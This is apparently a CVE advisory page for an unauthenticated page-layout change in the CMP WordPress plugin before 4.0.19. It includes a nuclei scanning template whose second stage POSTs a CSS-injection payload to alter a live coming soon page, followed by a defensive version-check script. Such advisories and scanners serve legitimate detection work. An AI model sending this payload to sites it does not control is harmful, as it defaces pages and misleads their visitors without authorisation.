CVE-2022-0188: CMP WordPress < 4.0.19 - Broken Access Control

Date: 2026-01-24 | Affected software: CMP WordPress | PoC: public

Vulnerability description

CMP WordPress plugin versions before 4.0.19 allow an arbitrary page layout change because of insufficient access control in the coming soon page feature: unauthenticated users can modify the layout, so exploitation requires no authentication.

PoC code [public]

id: CVE-2022-0188

info:
  name: CMP WordPress < 4.0.19 - Broken Access Control
  author: pussycat0x
  severity: medium
  description: |
    CMP WordPress plugin < 4.0.19 contains an arbitrary page layout change caused by insufficient access control in the coming soon page feature, letting unauthenticated users modify the layout, exploit requires no authentication.
  reference:
    - https://wpscan.com/vulnerability/50b6f770-6f53-41ef-b2f3-2a58e9afd332/
  impact:
    Unauthenticated users can alter the coming soon page layout, potentially misleading visitors or causing defacement.
  remediation:
    Update to version 4.0.19 or later.
  metadata:
    verified: true
    max-request: 3
    shodan-query: html:"wp-content/plugins/cmp-coming-soon-maintenance"
  tags: cve,cve2022,wp-scan,wordpress,wp-plugin,cmp,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/cmp-coming-soon-maintenance/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 4.0.19')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        niteoCS_footer_background_opacity_hardwork=0);body{background:url({{randstr}});}div{color:red

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains_all(body_2, '{{randstr}}','cmp-coming-soon-maintenance')"
          - "contains_any(body_2, 'niteoCS','cmp-theme','coming-soon')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        name: injected-css
        part: body_2
        group: 1
        regex:
          - 'background:url\(([a-zA-Z0-9]+)\)'
# digest: 4a0a0047304502203505af93572a3093ccf440dd1645e78d00042cc9cef657f25d664841fa2ca4ac022100a819d7f367cdf8e4f312afe56f45f9593ce46b8a29d3068fa1abb7bf774127bc:922c64590222798bb761d5b6d8e72950
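The first stage of the template above only fingerprints the installed plugin version from the public readme.txt and compares it against 4.0.19. The following Python is an added example (not part of the original page or of the nuclei project) that a site administrator can run against their own plugin's readme to decide whether an update is needed. It assumes a readme in the standard WordPress format with a "Stable tag:" line; the readme text embedded below is constructed, not fetched from any site. It also shows why the comparison must be numeric per component: a plain string compare ranks 4.0.9 above 4.0.19 and would report a vulnerable install as fixed.

```python
import re

# Version at which the access control issue was fixed (from the advisory).
FIXED_VERSION = "4.0.19"

# Constructed sample of a WordPress plugin readme.txt header (not from a real site).
SAMPLE_README = """=== CMP - Coming Soon & Maintenance Plugin ===
Contributors: example
Requires at least: 4.6
Tested up to: 6.0
Stable tag: 4.0.9
License: GPLv2 or later
"""


def parse_stable_tag(readme_text):
    """Return the numeric 'Stable tag' version from a plugin readme, or None.

    Tags such as 'trunk' carry no version and yield None, the same way the
    template's extractor regex would fail to match them.
    """
    m = re.search(r'Stable tag:\s*([0-9.]+)', readme_text)
    return m.group(1) if m else None


def version_tuple(v):
    """Split a dotted version into integers so 4.0.9 sorts before 4.0.19."""
    return tuple(int(p) for p in v.split('.') if p != '')


def is_vulnerable_version(installed, fixed=FIXED_VERSION):
    """True when installed < fixed, compared numerically component by component."""
    a, b = version_tuple(installed), version_tuple(fixed)
    # Pad the shorter tuple with zeros so that 4.0 compares equal to 4.0.0.
    n = max(len(a), len(b))
    a += (0,) * (n - len(a))
    b += (0,) * (n - len(b))
    return a < b


def assess_readme(readme_text):
    """Return (version, vulnerable) for a readme, or (None, None) if no tag is found."""
    v = parse_stable_tag(readme_text)
    if v is None:
        return None, None
    return v, is_vulnerable_version(v)


if __name__ == "__main__":
    version, vulnerable = assess_readme(SAMPLE_README)
    status = "update required" if vulnerable else "at or above fixed version"
    print(f"Stable tag {version}: {status}")
    # A naive string comparison gets this case wrong and reports 4.0.9 as fixed.
    print("string compare says vulnerable:", "4.0.9" < "4.0.19")
```

The second stage of the template (the POST that alters the coming soon page styling) is the intrusive check and is not reproduced here; for a site you administer, the version comparison is sufficient to decide whether to update, and an unexpected `background:url(` rule in the served coming soon page is the indicator the template's last extractor looks for.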
